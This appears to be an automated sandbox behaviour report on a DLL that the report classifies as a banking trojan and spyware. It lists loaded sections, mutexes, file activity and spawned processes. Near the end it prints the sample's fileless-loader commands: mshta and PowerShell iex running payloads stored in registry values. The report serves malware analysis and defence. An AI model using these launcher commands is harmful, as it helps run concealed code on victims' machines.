Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@53/156@14/6

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04FA56A2 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

1_2_04FA56A2

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{0230B639-3F09-11EB-90E5-ECF4BB2D2496}.dat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4540
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{108A7729-2F56-C20D-3944-D3167DB8B7AA}
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3810B7D7-3716-2AFE-81EC-5BFE45E0BF12}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{2C8DF39C-9BA6-3E2B-8520-FF528954A3A6}

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF739EFE0EB6EEE638.TMP

Jump to behavior

Source: 5fd885c499439tar.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: 5fd885c499439tar.dll	Virustotal: Detection: 18%
Source: 5fd885c499439tar.dll	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\5fd885c499439tar.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5fd885c499439tar.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82952 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82966 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17432 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17436 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline'
